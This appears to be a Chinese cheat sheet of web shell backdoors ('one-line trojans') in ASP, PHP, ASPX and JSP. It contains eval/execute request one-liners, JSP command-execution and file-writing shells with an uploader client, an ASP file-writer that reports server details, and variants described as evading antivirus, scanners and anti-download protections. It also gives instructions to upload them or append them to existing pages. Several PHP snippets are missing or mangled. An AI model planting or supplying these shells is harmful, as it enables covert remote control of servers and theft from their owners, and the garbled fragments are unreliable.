一句话木马

一句话木马

asp

<%execute(request("kxc"))%>

<%eval request ("pass")%>

<%eval request(chr(35))%>

<%executerequest("YouPass")%>

<%eval(request(“1″)):response.end%>

php

' ) ; ?>



  #将当前目录下创建xie.php文件，并且将一句话木马写入xd.php中



"XC90");

$b=array_keys($a,'XC90');

declare(ticks=1);

register_tick_function($b[0], $_REQUEST['x']);

?>

aspx

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"],"unsafe");%>

一句话木马变形

jsp脚本后门

先把下面的代码保存为 one.jsp (该代码的作用是可以在当前目录下生成另外一个指定的文件)，然后上传到服务器

<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

然后将下面的代码保存为 .html 格式的，直接双击本地打开。这是作为客户端去连接我们刚刚上传的one.jsp的

  专用JSP木马连接器
服务端地址  

你要提交到服务器的代码
要保存成的文件名： 
  
服务端代码：
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>    

无回显执行命令

将下面的命令保存为 a.jsp，然后上传到服务器

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

有回显带密码执行命令

将下面的命令保存为 b.jsp，然后上传到服务器

<%

    if("b".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("
");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("
");

    }

%>

参考

其它

<%eval request("c")%>

<%execute request("c")%>

<%execute(request("c"))%>

<%ExecuteGlobal request("sb")%>

%><%Eval(Request(chr(35)))%><%

<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>

<%eval(Request.Item["c"],"unsafe");%>

'备份专用

<%eval(request("c")):response.end%>

'无防下载表,有防下载表突破专用一句话

<%execute request("c")%><%<%loop<%:%>

<%<%loop<%:%><%execute request("c")%>

<%execute request("c")<%loop<%:%>

'防杀防扫专用

<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>

'不用"<,>"



<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.

名字)+'') %>





'不用双引号

<%eval request(chr(35))%>

'可以躲过雷客图

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>

<%dy=request("dy")%><%Eval(dy)%>

'容错代码

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

PHP一句话











//容错代码

//使用Lanker一句话客户端的专家模式执行相关的PHP语句





/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:h=@eval_r($_POST1);



//绕过@eval_r($_POST[sb])

//绕过限制的一句话



提交客户端




ASPX一句话



普通的php一句话：

普通的asp一句话：<%eval(Request.Item["r00ts"],”unsafe”);%>

aspx突破一流的：

dim da

set fso=server.createobject("scripting.filesystemobject")

path=request("path")

if path<>"" then

data=request("da")

set da=fso.createtextfile(path,true)

da.write data

if err=0 then

Response.Write "yes"

else

Response.Write "no"

end if

err.clear

end if

set da=nothing

set fos=nothing

Response.Write "
"

Response.Write "
"

Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))

Response.Write "
"

Response.Write "操作系统为:"&Request.ServerVariables("OS")

Response.Write "
"

Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")

Response.Write "
"

Response.Write ""

Response.Write "
"

Response.Write ""

Response.Write "
"



ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防杀放扫 一句话：

上面这句是防杀防扫的！网上很少人用！可以插在网页任何ASP文件的最底部不会出错，比如

index.asp里面也是可以的！

因为加了判断！加了判断的PHP一句话，与上面的ASP一句话相同道理，也是可以插在任何PHP文件

的最底部不会出错！

无防下载表，有防下载表可尝试插入以下语句突破的一句话

<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>

备份专用<%eval(request(“1″)):response.end%>

asp一句话<%execute(request(“1″))%>

aspx一句话:WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y(“add6bb58e139be10″);

可以躲过雷客图的一句话。

<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)

ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,

requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

不用'<,>‘的asp一句话execute request(“1″)

不用双引号的一句话。<%eval request(chr(35))%>

参考